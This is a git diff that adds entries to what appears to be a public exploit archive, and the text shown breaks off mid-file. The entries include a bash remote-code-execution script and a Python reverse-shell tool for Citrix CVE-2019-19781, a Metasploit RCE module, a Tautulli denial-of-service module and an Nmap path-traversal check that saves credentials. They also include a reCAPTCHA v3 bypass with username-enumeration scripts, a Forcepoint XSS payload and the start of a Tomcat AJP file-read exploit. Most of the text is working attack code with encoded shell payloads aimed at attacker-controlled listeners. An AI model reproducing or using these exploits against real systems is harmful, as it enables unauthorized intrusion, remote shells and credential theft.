+So far we know that adding `?static=1` to a wordpress URL should leak its secret content
+
+Here are a few ways to manipulate the returned entries:
+
+- `order` with `asc` or `desc`
+- `orderby`
+- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
+
+
+In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47901.sh b/exploits/multiple/webapps/47901.sh
new file mode 100755
index 000000000..f9e4d7557
--- /dev/null
+++ b/exploits/multiple/webapps/47901.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
+# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
+# Release Date : 11/01/2020
+# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
+echo "=================================================================================
+ ___             _           _     ____                 ___           _  _
+| _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _
+|  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
+|_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
+              |__/                                                 CVE-2019-19781
+================================================================================="
+##############################
+if [ -z "$1" ];
+then
+echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
+exit;
+fi
+filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
+curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
+echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
+echo -ne "Command Output :\n"
+curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47902.py b/exploits/multiple/webapps/47902.py
new file mode 100755
index 000000000..a9c4d655b
--- /dev/null
+++ b/exploits/multiple/webapps/47902.py
@@ -0,0 +1,132 @@
+#!/usr/bin/python3
+#
+# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
+#
+# You only need a listener like netcat to catch the shell.
+#
+# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
+#
+# Tool Written by: Rob Simon and David Kennedy
+
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
+import random
+import string
+import time
+from random import randint
+import argparse
+import sys
+
+# random string generator
+def randomString(stringLength=10):
+    letters = string.ascii_lowercase
+    return ''.join(random.choice(letters) for i in range(stringLength))
+
+# our random string for filename - will leave artifacts on system
+filename = randomString()
+randomuser = randomString()
+
+# generate random number for the nonce
+nonce = randint(5, 15) 
+
+# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
+# note that the file location will be in /netscaler/portal/templates/filename.xml
+def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):
+
+    # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
+    encoded = ""
+    i=0
+    text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
+    while i < len(text):
+        encoded = encoded + "chr("+str(ord(text[i]))+") . "
+        i += 1
+    encoded = encoded[:-3]
+    payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
+    headers = ( 
+        {
+            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
+            'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
+            'NSC_NONCE' : '%s' % (nonce),
+        })
+
+    data = (
+        {
+            "url" : "127.0.0.1",
+            "title" : payload,
+            "desc" : "desc",
+            "UI_inuse" : "a"
+        })
+
+    url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
+    requests.post(url, data=data, headers=headers, verify=False)
+
+# this is our second stage that triggers the exploit for us
+def stage2(filename, randomuser, nonce, victimip, victimport):
+    headers = (
+        {
+            'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
+            'NSC_USER' : '%s' % (randomuser),
+            'NSC_NONCE' : '%s' % (nonce),
+        })
+
+    requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)
+
+
+# start our main code to execute
+print('''
+
+  .o oOOOOOOOo                                            OOOo
+    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
+    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
+    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
+    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
+    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
+    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
+   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
+  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
+ OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
+ "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
+    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
+    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
+    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
+                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
+                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
+    .                  .     OP"          : o     .
+                              :
+
+Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
+Tool Written by: Rob Simon and Dave Kennedy
+Contributions: The TrustedSec Team 
+Website: https://www.trustedsec.com
+INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
+
+This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
+to append files in an XML format to the victim machine. This in turn allows for remote code execution.
+
+Be sure to cleanup these two file locations:
+    /var/tmp/netscaler/portal/templates/
+    /netscaler/portal/templates/
+
+Usage:
+
+python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')
+
+# parse our commands
+parser = argparse.ArgumentParser()
+parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
+parser.add_argument("targetport", help="the target server web port (normally on 443)")
+parser.add_argument("attackerip", help="the attackers reverse listener IP address")
+parser.add_argument("attackerport", help="the attackersa reverse listener port")
+args = parser.parse_args()
+print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
+print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
+# trigger our first post
+stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
+print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
+time.sleep(2)
+print("[*] Triggering GET request for the newly created file with a listener waiting...")
+print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
+print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
+# trigger our second post
+stage2(filename, randomuser, nonce, args.target, args.targetport)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47913.rb b/exploits/multiple/webapps/47913.rb
new file mode 100755
index 000000000..3731abb8e
--- /dev/null
+++ b/exploits/multiple/webapps/47913.rb
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Citrix ADC Remote Code Execution',
+      'Description' => %q(
+        An issue was discovered in Citrix Application Delivery Controller (ADC)
+        and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
+      ),
+      'Author' => [
+        'RAMELLA Sébastien' # https://www.pirates.re/
+      ],
+      'References' => [
+        ['CVE', '2019-19781'],
+        ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],
+        ['EDB', '47901'],
+        ['EDB', '47902']
+      ],
+      'DisclosureDate' => '2019-12-17',
+      'License' => MSF_LICENSE,
+      'Platform' => ['unix'],
+      'Arch' => ARCH_CMD,
+      'Privileged' => true,
+      'Payload' => {
+        'Compat' => {
+          'PayloadType' => 'cmd',
+          'RequiredCmd' => 'generic perl meterpreter'
+        }
+      },
+      'Targets' => [
+        ['Unix (remote shell)',
+          'Type' => :cmd_shell,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_perl',
+            'DisablePayloadHandler' => 'false'
+          }
+        ],
+        ['Unix (command-line)',
+          'Type' => :cmd_generic,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/generic',
+            'DisablePayloadHandler' => 'true'
+          }
+        ],
+      ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL'   => true
+      },
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptAddress.new('RHOST', [true, 'The target address'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+
+    deregister_options('RHOSTS')
+  end
+
+  def execute_command(command, opts = {})
+    filename = Rex::Text.rand_text_alpha(16)
+    nonce = Rex::Text.rand_text_alpha(6)
+
+    request  = {
+      'method' => 'POST',
+      'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),
+      'headers' => {
+        'NSC_USER' => '../../../netscaler/portal/templates/' + filename,
+        'NSC_NONCE' => nonce
+      },
+      'vars_post' => {
+        'url' => 'http://127.0.0.1',
+        'title' => "[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]",
+        'desc' => 'desc',
+        'UI_inuse' => 'RfWeb'
+      },
+      'encode_params' => false
+    }
+
+    begin
+      received = send_request_cgi(request)
+    rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
+      print_error('Unable to connect on the remote target.')
+    end
+    return false unless received
+
+    if received.code == 200
+      vprint_status("#{received.get_html_document.text}")
+      sleep 2
+
+      request = {
+        'method' => 'GET',
+        'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),
+        'headers' => {
+          'NSC_USER' => nonce,
+          'NSC_NONCE' => nonce
+        }
+      }
+
+      ## Trigger to gain exploitation.
+      begin
+        send_request_cgi(request)
+        received = send_request_cgi(request)
+      rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
+        print_error('Unable to connect on the remote target.')
+      end
+      return false unless received
+      return received
+    end
+
+    return false
+  end
+
+  def get_chr_payload(command)
+    chr_payload = command
+    i = chr_payload.length
+
+    output = ""
+    chr_payload.each_char do | c |
+      i = i - 1
+      output << "chr(" << c.ord.to_s << ")"
+      if i != 0
+        output << " . "
+      end
+    end
+
+    return output
+  end
+
+  def check
+    begin
+      received = send_request_cgi(
+        "method" => "GET",
+        "uri" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')
+      )
+    rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN
+      print_error('Unable to connect on the remote target.')
+    end
+
+    if received && received.code != 200
+      return Exploit::CheckCode::Safe
+    end
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check.eql? Exploit::CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
+      end
+    else
+        print_good('The target appears to be vulnerable.')
+    end
+
+    case target['Type']
+    when :cmd_generic
+      print_status("Sending #{datastore['PAYLOAD']} command payload")
+      vprint_status("Generated command payload: #{payload.encoded}")
+
+      received = execute_command(payload.encoded)
+      if (received) && (datastore['PAYLOAD'] == "cmd/unix/generic")
+        print_warning('Dumping command output in parsed http response')
+        print_good("#{received.get_html_document.text}")
+      else
+        print_warning('Empty response, no command output')
+        return
+      end
+
+    when :cmd_shell
+      print_status("Sending #{datastore['PAYLOAD']} command payload")
+      vprint_status("Generated command payload: #{payload.encoded}")
+
+      execute_command(payload.encoded)
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47929.rb b/exploits/multiple/webapps/47929.rb
new file mode 100755
index 000000000..a3aec5061
--- /dev/null
+++ b/exploits/multiple/webapps/47929.rb
@@ -0,0 +1,38 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'        => 'Tautulli v2.1.9 - Shutdown Denial of Service',
+      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
+      'Author'      => 'Ismail Tasdelen',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+      [
+        ['CVE', '2019-19833'],
+        ['EDB', '47785']
+      ]
+    )
+    register_options([ Opt::RPORT(8181) ])
+  end
+
+  def run
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => '/shutdown'
+    })
+
+    if res
+      print_status("Request sent to #{rhost}")
+    else
+      print_status("No reply from #{rhost}")
+    end
+  rescue Errno::ECONNRESET
+    print_status('Connection reset')
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47930.txt b/exploits/multiple/webapps/47930.txt
new file mode 100644
index 000000000..a300fe02f
--- /dev/null
+++ b/exploits/multiple/webapps/47930.txt
@@ -0,0 +1,130 @@
+# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal
+# Date: 2019-12-17
+# CVE: CVE-2019-19781
+# Vulenrability: Path Traversal
+# Vulnerablity Discovery: Mikhail Klyuchnikov
+# Exploit Author: Dhiraj Mishra
+# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
+# Vendor Homepage: https://www.citrix.com/
+# References: https://support.citrix.com/article/CTX267027
+# https://github.com/nmap/nmap/pull/1893
+
+local http = require "http"
+local stdnse = require "stdnse"
+local shortport = require "shortport"
+local table = require "table"
+local string = require "string"
+local vulns = require "vulns"
+local nmap = require "nmap"
+local io = require "io"
+
+description = [[
+This NSE script checks whether the traget server is vulnerable to
+CVE-2019-19781
+]]
+---
+-- @usage
+-- nmap --script https-citrix-path-traversal -p <port> <host>
+-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args
+output='file.txt'
+-- @output
+-- PORT   STATE SERVICE
+-- 443/tcp open  http
+-- | CVE-2019-19781:
+-- |   Host is vulnerable to CVE-2019-19781
+-- @changelog
+-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
+-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
+-- @xmloutput
+-- <table key="NMAP-1">
+-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>
+-- <elem key="state">VULNERABLE</elem>
+-- <table key="description">
+-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,
+11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path
+-- traversal vulnerability that allows attackers to read configurations or
+any other file.
+-- </table>
+-- <table key="dates">
+-- <table key="disclosure">
+-- <elem key="year">2019</elem>
+-- <elem key="day">17</elem>
+-- <elem key="month">12</elem>
+-- </table>
+-- </table>
+-- <elem key="disclosure">17-12-2019</elem>
+-- <table key="extra_info">
+-- </table>
+-- <table key="refs">
+-- <elem>https://support.citrix.com/article/CTX267027</elem>
+-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>
+-- </table>
+-- </table>
+
+author = "Dhiraj Mishra (@RandomDhiraj)"
+Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"discovery", "intrusive","vuln"}
+
+portrule = shortport.ssl
+
+action = function(host,port)
+  local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
+  local vuln = {
+    title = 'Citrix ADC Path Traversal',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
+12.1, and 13.0 are vulnerable
+to a unauthenticated path traversal vulnerability that allows attackers to
+read configurations or any other file.
+    ]],
+    references = {
+      'https://support.citrix.com/article/CTX267027',
+      'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
+    },
+    dates = {
+      disclosure = {year = '2019', month = '12', day = '17'},
+    },
+  }
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local path = "/vpn/../vpns/cfg/smb.conf"
+  local response
+  local output = {}
+  local success = "Host is vulnerable to CVE-2019-19781"
+  local fail = "Host is not vulnerable"
+  local match = "[global]"
+  local credentials
+  local citrixADC
+  response = http.get(host, port.number, path)
+
+  if not response.status then
+    stdnse.print_debug("Request Failed")
+    return
+  end
+  if response.status == 200 then
+    if string.match(response.body, match) then
+      stdnse.print_debug("%s: %s GET %s - 200 OK",
+SCRIPT_NAME,host.targetname or host.ip, path)
+      vuln.state = vulns.STATE.VULN
+      citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname
+or host.ip,port.number, path))
+      if outputFile then
+        credentials = response.body:gsub('%W','.')
+vuln.check_results = stdnse.format_output(true, citrixADC)
+        vuln.extra_info = stdnse.format_output(true, "Credentials are being
+stored in the output file")
+file = io.open(outputFile, "a")
+file:write(credentials, "\n")
+      else
+        vuln.check_results = stdnse.format_output(true, citrixADC)
+      end
+    end
+  elseif response.status == 403 then
+    stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname
+or host.ip, path, response.status)
+    vuln.state = vulns.STATE.NOT_VULN
+  end
+
+  return vuln_report:make_output(vuln)
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48027.txt b/exploits/multiple/webapps/48027.txt
new file mode 100644
index 000000000..509464bdc
--- /dev/null
+++ b/exploits/multiple/webapps/48027.txt
@@ -0,0 +1,182 @@
+# Exploit Title: Google Invisible RECAPTCHA 3 - Spoof Bypass
+# Date: 2020-02-07
+# Vendor Homepage: https://developers.google.com/recaptcha/docs/invisible
+# Exploit Git Repo: https://github.com/matamorphosis/Browser-Exploits/tree/master/RECAPTCHA_Bypass
+# Exploit Author: Matamorphosis
+# Tested on: Windows and Ubuntu 19.10
+# Category: Web Apps
+
+--------------------------------------------------------------------------------------------
+RECAPTCHA Bypass:
+--------------------------------------------------------------------------------------------
+This tool allows a user to bypass Version 3 of Google's Invisible RECAPTCHA by creating a spoofed web app that leverages the same RECAPTCHA, by providing the victims site key.  
+
+What makes a site vulnerable?
+1. They are using Version 3 of Google's Invisible RECAPTCHA
+2. They allow the site key to be used on "localhost". However, while currently untested you could try adding the DNS name of the target you are attacking and try resolving it to 127.0.0.1 in your hosts file.
+  
+NOTE: Exploit users need to have a functional understanding of both Python and JavaScript to make the necessary changes to run this exploit.
+
+--------------------------------------------------------------------------------------------
+PREREQUISITES:
+--------------------------------------------------------------------------------------------
+The instructions supplied are written for Debian-based Linux distributions. However, this can be setup on any OS with relative ease.
+1. Download and install Firefox located at https://www.mozilla.org/en-US/firefox/new/
+2. Download Gecko Driver located at https://github.com/mozilla/geckodriver/releases and ensure the binary is in your path. For *nux just copy the file to /usr/bin
+```
+user@linux:~$ sudo cp geckodriver /usr/bin/geckodriver
+```
+3. To use this exploit, you need to install python3, pip3 and install the additional requirements that are in the requirements.txt file.
+```
+user@linux:~$ sudo apt install python3 python3-pip -y
+```
+4. Now install the prerequisistes
+```
+user@linux:~$ pip3 install -r requirements.txt
+```
+
+--------------------------------------------------------------------------------------------
+USAGE:
+--------------------------------------------------------------------------------------------
+1. Obtain the site key from the target web application. There should be JavaScript that looks like the following - use the inspect element function to view it, there are two locations you can grab the site key:
+```
+<script src="https://www.google.com/recaptcha/api.js?render=<SITE-KEY-HERE>"></script>
+<script>
+  grecaptcha.ready(function() {
+    grecaptcha.execute('<SITE-KEY-HERE>', {action:'validate_captcha'})
+          .then(function(token) {
+      // add token value to form
+      document.getElementById('g-recaptcha-response').value = token;
+    });
+  });
+</script>
+```
+2. Open the index.html file and paste the Site Key into the appropriate locations.
+3. This next part is where it gets a little tricky. You need to replicate the form you are attacking and change a few things. Firstly in the body of the index.html file. Ensure you are using the appropriate method "GET" or "POST" and you are submitting it to the correct destination.
+```
+<body>
+	<form id="form_id" method="<METHOD GOES HERE>" action="<VICTIM FORM SUBMISSION LINK>"
+		<input type="hidden" id="g-recaptcha-response" name="captcha">
+		<input id="accName" type="text" name="accountName" value="">
+		<input id="uName" type="text" name="username" value="">
+		<input type="submit" value="Submit">
+	</form>
+</body>
+```
+*For steps 4-6, example code has been provided already, but ensure it matches the site you are targetting. It may be easier to strip it out and follow 4-6 if you are having a difficult time getting it working.*  
+  
+4. Next you will need to add the following lines to the body of the JavaScript already inside of the <script> tags in the head of the html, after the last line.
+```
+var url_string = window.location.href;
+var url = new URL(url_string);
+```
+5. After this you need to add the following lines **for each** visible <input> tag in the form you are attacking. This code will automatically take what parameters are provided to the page and set the input elements accordingly.
+```
+var paramValue1 = url.searchParams.get("accountName");
+var account = document.getElementById("accName");
+account.value = paramValue1;
+```
+6. Lastly, add the following lines after you have added JavaScript for each of the <input> tags:
+```
+var frm = document.getElementById("form_id");
+frm.submit();
+```
+7. Now you need to edit the enumerate.py file to suit your needs. First ensure you change the function to suit the parameters required by your index.html file. In the below example I am trying to enumerate usernames, for an accountname that is the same everytime. Note: You must use "localhost" or a DNS name, using "127.0.0.1" or another IP address will probably not work.
+```
+accountName = 'testAccount'
+
+def attempt(user):
+    driver = webdriver.Firefox()
+    driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')
+```
+8. Everytime the above function is called, a new Firefox window will be opened, and the link will be called. *If you wish to try and get this working in a headless mode and you succeed, kindly contribute your changes to this repository* This will allow for the JavaScript to be executed to get the needed CAPTCHA which will automatically be forwarded onto the destination. After this create a threaded for loop to suit your needs that iterates through a list, that calls the above function for each attempt:
+```
+for user in ['user1', 'user2', 'user3']:
+    thread = threading.Thread(target=attempt, args=(user,))
+    thread.start()
+```
+9. You are now ready to run the exploit, in one terminal session start the web server. This will run on localhost on TCP port 8000. You can change these settings by editing the http_serve.py file:
+```
+user@linux:~$ python3 http_serve.py
+```
+10. In another terminal session, run the enumerate.py script, and watch it run!
+```
+user@linux:~$ python3 enumerate.py
+```
+--------------------------------------------------------------------------------------------
+FILES:
+--------------------------------------------------------------------------------------------
+---- http_serve.py ----
+--------------------------------------------------------------------------------------------
+#!/usr/bin/python3
+import http.server
+import socketserver
+
+PORT = 8000
+
+Handler = http.server.SimpleHTTPRequestHandler
+
+httpd = socketserver.TCPServer(("localhost", PORT), Handler)
+
+print("serving at port", PORT)
+httpd.serve_forever()
+
+--------------------------------------------------------------------------------------------
+---- enumerate.py ----
+--------------------------------------------------------------------------------------------
+#!/usr/bin/python3
+from selenium import webdriver
+from selenium.common.exceptions import TimeoutException
+from selenium.webdriver.support.ui import WebDriverWait
+from selenium.webdriver.support import expected_conditions as EC
+from selenium.webdriver.common.by import By
+import threading
+
+accountName = 'foobar'
+
+def attempt(user):
+    driver = webdriver.Firefox()
+    driver.get(f'http://localhost:8000?accountName={accountName}&username={user}')
+
+for user in ['user1', 'user2', 'user3']:
+    thread = threading.Thread(target=attempt, args=(user,))
+    thread.start()
+
+--------------------------------------------------------------------------------------------
+---- index.html ----
+--------------------------------------------------------------------------------------------
+<!DOCTYPE html>
+	<head>
+		<script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/TYDIjJAqCk6g335bFk3AjlC3/recaptcha__en.js"></script>
+		<script src="https://www.google.com/recaptcha/api.js?render=<SITE_KEY_GOES_HERE>"></script>
+		<script>
+			grecaptcha.ready(function() {
+			// do request for recaptcha token
+			// response is promise with passed token
+				grecaptcha.execute('<SITE_KEY_GOES_HERE>', {action:'validate_captcha'})
+						  .then(function(token) {
+					// add token value to form
+					document.getElementById('g-recaptcha-response').value = token;
+					var url_string = window.location.href;
+					var url = new URL(url_string);
+					var paramValue1 = url.searchParams.get("accountName");
+					var account = document.getElementById("accName");
+					account.value = paramValue1;
+					var paramValue2 = url.searchParams.get("username");
+					var uname = document.getElementById("uName");
+					uname.value = paramValue2;
+					var frm = document.getElementById("form_id");
+					frm.submit();
+				});
+			});
+		</script>
+	</head>
+	<body>
+		<form id="form_id" method="<METHOD>" action="<VICTIM FORM SUBMISSION LINK>">
+			<input type="hidden" id="g-recaptcha-response" name="captcha">
+			<input id="accName" type="text" name="accountName" value="">
+			<input id="uName" type="text" name="username" value="">
+			<input type="submit" value="Submit">
+		</form>
+	</body>
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48029.txt b/exploits/multiple/webapps/48029.txt
new file mode 100644
index 000000000..ba409bab4
--- /dev/null
+++ b/exploits/multiple/webapps/48029.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
+# Exploit Author: Prasenjit Kanti Paul
+# Vendor Homepage: https://www.forcepoint.com/
+# Software Link: https://www.forcepoint.com/product/cloud-security/web-security
+# Version: Forcepoint Web Security 8.5
+# Tested on: Windows 7,10 and Linux Mint
+# CVE : CVE-2019-6146
+# ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702
+# Video PoC: https://youtu.be/NfXGaNVK6eE
+
+# Description: User must visit any site which is restricted as per
+# forcepoint policy. So that forcepoint web security will show a generic
+# page. While parsing "Domain Name" within generic page forcepoint is not
+# validating Host header, which caused XSS.
+
+Lets assume, while accessing anysite.com, forcepoint web security prevents
+us to go to that website with its custom exception/blocking page. Now
+follow the steps below:
+
+*Steps*:
+
+   1. Intercept the traffic while accessing https://anysite.com
+   2. Modify the Host header from anysite.com to ">
+   <script>alert("evilsite")</script>
+
+*Timeline:*
+
+   - Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint
+   - Oct. 23, 2019 - ForcePoint team confirms the issue
+   - Oct. 24, 2019 - CVE-2019-6146 has been assigned
+   - Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes
+
+
+*Regards,*
+*Prasenjit Kanti Paul*
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48108.txt b/exploits/multiple/webapps/48108.txt
new file mode 100644
index 000000000..56a6051ca
--- /dev/null
+++ b/exploits/multiple/webapps/48108.txt
@@ -0,0 +1 @@
+1
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48143.py b/exploits/multiple/webapps/48143.py
new file mode 100755
index 000000000..e6ee3483a
--- /dev/null
+++ b/exploits/multiple/webapps/48143.py
@@ -0,0 +1,302 @@
+#!/usr/bin/env python
+#CNVD-2020-10487  Tomcat-Ajp lfi
+#by ydhcui
+import struct
+
+# Some references:
+# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
+def pack_string(s):
+	if s is None:
+		return struct.pack(">h", -1)
+	l = len(s)
+	return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
+def unpack(stream, fmt):
+	size = struct.calcsize(fmt)
+	buf = stream.read(size)
+	return struct.unpack(fmt, buf)
+def unpack_string(stream):
+	size, = unpack(stream, ">h")
+	if size == -1: # null string
+		return None
+	res, = unpack(stream, "%ds" % size)
+	stream.read(1) # \0
+	return res
+class NotFoundException(Exception):
+	pass
+class AjpBodyRequest(object):
+	# server == web server, container == servlet
+	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
+	MAX_REQUEST_LENGTH = 8186
+	def __init__(self, data_stream, data_len, data_direction=None):
+		self.data_stream = data_stream
+		self.data_len = data_len
+		self.data_direction = data_direction
+	def serialize(self):
+		data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
+		if len(data) == 0:
+			return struct.pack(">bbH", 0x12, 0x34, 0x00)
+		else:
+			res = struct.pack(">H", len(data))
+			res += data
+		if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
+			header = struct.pack(">bbH", 0x12, 0x34, len(res))
+		else:
+			header = struct.pack(">bbH", 0x41, 0x42, len(res))
+		return header + res
+	def send_and_receive(self, socket, stream):
+		while True:
